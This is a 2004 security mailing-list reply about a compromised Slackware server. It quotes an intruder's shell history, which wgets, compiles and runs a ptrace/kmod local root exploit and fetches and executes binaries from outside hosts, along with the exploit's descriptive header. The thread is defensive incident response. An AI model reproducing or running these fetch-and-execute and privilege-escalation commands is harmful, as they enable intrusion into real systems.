Re: Visited by a cracker

From: Louie Miranda (lmiranda_at_gmail.com)
Date: 07/12/04

  • Next message: Yusuf Wilajati Purna: "LIDS 1.2.2rc1 for kernel 2.4.26 released"
    Date: Mon, 12 Jul 2004 09:54:35 +0800
    To: focus-linux@securityfocus.com
    
    

    Double check for trojans on your processes. Even if you did run
    chkrootkit to check it out.

    like: ps, top, ls

    and try running this: lsof, if you have the time. try to look for more
    suspicious programs.

    Thanks,
    Louie

    On Sun, 11 Jul 2004 16:45:09 +0200, Per Christian B. Viken
    <perchr@angryadmin.net> wrote:
    > Hello
    >
    > I've had a rather disturbing evening.
    > A friend of mine runs a small server for himself and some friends. It's
    > running slackware 10.
    > When I logged in, I noticed that the load was way over what's normal (around
    > 1.36 now, usually it's under 0.10), so I run 'top'. I see a program called
    > 'strace' running, hogging all the cpu power.
    >
    > So I get curious. I chdir to the users home, and looks around. It's empty.
    > But, the 'smart' little cracker has forgotten about .bash_history, so here I
    > can see everything that he has been doing.
    > Aparently, he has downloaded and setup an eggdrop, removed it again, and
    > then downloaded a psybnc, which he also removed shortly. Then things get
    > interesting.
    >
    > <SNIP>
    > wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
    > gcc ptrace-kmod.c -o ptrace
    > ./ptrace
    > chmod +x ptrace
    > ./ptrace
    > rm -rf ptrace
    > ls
    > rm -rf ptrace-kmod.c
    > wget www.drac.as.ro/egx
    > chmod +x egx
    > ./egx
    > who
    > passwd
    > Uptime
    > <SNIP>
    > ./egx
    > rm -rf egx
    > wget 220.88.27.11/usage/apache.tar.gz
    > </SNIP>
    >
    > The ptrace-kmod.c has this for a header:
    > /*
    > * Linux kernel ptrace/kmod local root exploit
    > *
    > * This code exploits a race condition in kernel/kmod.c, which creates
    > * kernel thread in insecure manner. This bug allows to ptrace cloned
    > * process, allowing to take control over privileged modprobe binary.
    > *
    > * Should work under all current 2.2.x and 2.4.x kernels.
    >
    > Luckily, the server runs 2.6.6, so this wasn't any threat.
    > The 'egx' executable seems to be somewhat like the other, cause when I run
    > it, it outputs '[-] Unable to determine kernel address: Operation not
    > supported' and dies.
    >
    > My guesses are that the apache.tar.gz-file is also some kind of exploit, but
    > I couldn't get it, so I didn't get a chance to see.
    >
    > Seeing that he didn't know how to properly hide his tracks, I hoped he might
    > be stupid enough to use his own IP to log in from as well, so I run 'cat
    > /var/log/messages | grep <username>'.
    > But, he has logged in and out using 7 different Ips. 5 belonging to
    > Pakistan, and the other two to Libanon.
    >
    > I've been suspicious to this user since my friend added him a few days ago.
    > He actually got a domain, prepaid for three years for an account, so I did
    > have some concerns about this.
    > Now, after discovering this, I've talked with my friend, and the credit card
    > used to paying for the domain, belongs to a woman in the UK. Probably stolen
    > or something.
    >
    > I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
    > anything.
    > So, my real question is:
    >
    > Is there anything else I should check out? Anywhere else some nasty exploits
    > or trojans might be hiding? And should I try to find this guy? Or is it
    > probably hopeless?
    >
    > Best Regards,
    > Per Christian B. Viken
    >
    > - --------------------------------------------
    > _
    > ASCII ribbon campaign ( )
    > - against HTML email X
    > & vCards / \
    >
    >

    -- 
    Louie Miranda
    http://www.axishift.com
    

  • Next message: Yusuf Wilajati Purna: "LIDS 1.2.2rc1 for kernel 2.4.26 released"